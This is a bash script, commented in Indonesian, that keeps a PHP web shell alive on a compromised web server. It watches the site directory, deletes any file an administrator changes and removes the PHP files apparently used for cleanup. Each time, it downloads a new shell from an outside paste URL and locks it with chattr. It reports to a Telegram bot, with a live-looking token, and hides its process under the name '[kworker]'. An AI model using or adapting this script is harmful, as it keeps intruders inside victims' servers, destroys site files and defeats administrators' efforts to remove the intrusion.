#!/bin/bash

# Konfigurasi
WEB_SHELL_DIR="/home/sekolahb/public_html/"      # Direktori webshell utama
BACKUP_SHELL="https://raw.zeverix.com/raw/untitled-719"    # Lokasi backup shell (URL)
TELEGRAM_BOT_TOKEN="7765041082:AAGhlbXBsa4qDiAKbVOSmtZ50Gw45-TcVK8"      # Token Telegram Bot
TELEGRAM_CHAT_ID="1345261884"          # Chat ID Telegram

# Fungsi kirim notifikasi ke Telegram
send_telegram() {
    local message="$1"
    timeout 3 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \
        -d "chat_id=$TELEGRAM_CHAT_ID" \
        -d "text=$message" > /dev/null 2>&1
}

# Fungsi deploy ulang shell
deploy_shell() {
    random_dir=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1)
    new_dir="/var/www/html/$random_dir"
    mkdir -p "$new_dir"
    chmod 750 "$new_dir"
    
    shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
    new_shell_path="$new_dir/$shell_name"
    
    # Download shell dari URL
    curl -s -o "$new_shell_path" "$BACKUP_SHELL"
    chmod 400 "$new_shell_path"
    
    if [ "$(id -u)" -eq 0 ]; then
        chattr +i "$new_shell_path" 2>/dev/null
    fi
    
    send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path"
    echo "$new_shell_path"
}

# Fungsi hapus file berbahaya
delete_intruder() {
    local target="$1"
    rm -f "$target"
    if [ -f "$target" ]; then
        shred -fuz "$target" 2>/dev/null
    fi
}

# Fungsi deteksi dan hapus balik PHP attacker
detect_and_delete_php_attacker() {
    # Cari proses PHP yang sedang berjalan dan mungkin menghapus file
    local php_processes=$(pgrep -f "php" | head -10)
    local attacker_found=""
    
    for pid in $php_processes; do
        # Dapatkan path file PHP yang sedang dieksekusi
        local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null)
        local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')
        
        # Periksa apakah proses tersebut berpotensi menghapus file
        if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then
            attacker_found="$php_file"
            break
        fi
        
        # Periksa apakah proses tersebut sedang mengakses direktori target
        if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then
            attacker_found="$php_file"
            break
        fi
    done
    
    # Jika ditemukan attacker, hapus file tersebut
    if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then
        delete_intruder "$attacker_found"
        send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found"
        echo "$attacker_found"
    fi
}

# Main loop dengan penyamaran proses
exec -a "[kworker]" bash -c '
# Buat direktori target jika belum ada
mkdir -p "$WEB_SHELL_DIR"

# Monitor direktori
inotifywait -m -r -e modify,move,delete,attrib "$WEB_SHELL_DIR" --format "%w%f %e" 2>/dev/null | while read file event
do
    [[ -d "$file" ]] && continue
    
    # Hapus file yang diotak-atik
    delete_intruder "$file"
    
    # Deteksi dan hapus balik PHP attacker
    attacker_file=$(detect_and_delete_php_attacker)
    
    # Deploy shell baru
    new_shell=$(deploy_shell)
    
    # Kirim notifikasi lengkap
    if [ -n "$attacker_file" ]; then
        send_telegram "🚨 PHP ATTACKER DETECTED & DELETED!
File: $file
Event: $event
Attacker: $attacker_file
New Shell: $new_shell
✅Mendeteksi file PHP yang dipakai untuk menghapus.
✅Menghapus balik file PHP tersebut secara otomatis.
✅Mengirim notifikasi ke bot Telegram Anda dengan detail ancamannya.
Prinsipnya simpel: Siapa berani hapus, langsung hilang duluan!🖕"
    else
        send_telegram "🚨 ALERT! File: $file | Event: $event | New Shell: $new_shell"
    fi
done
' &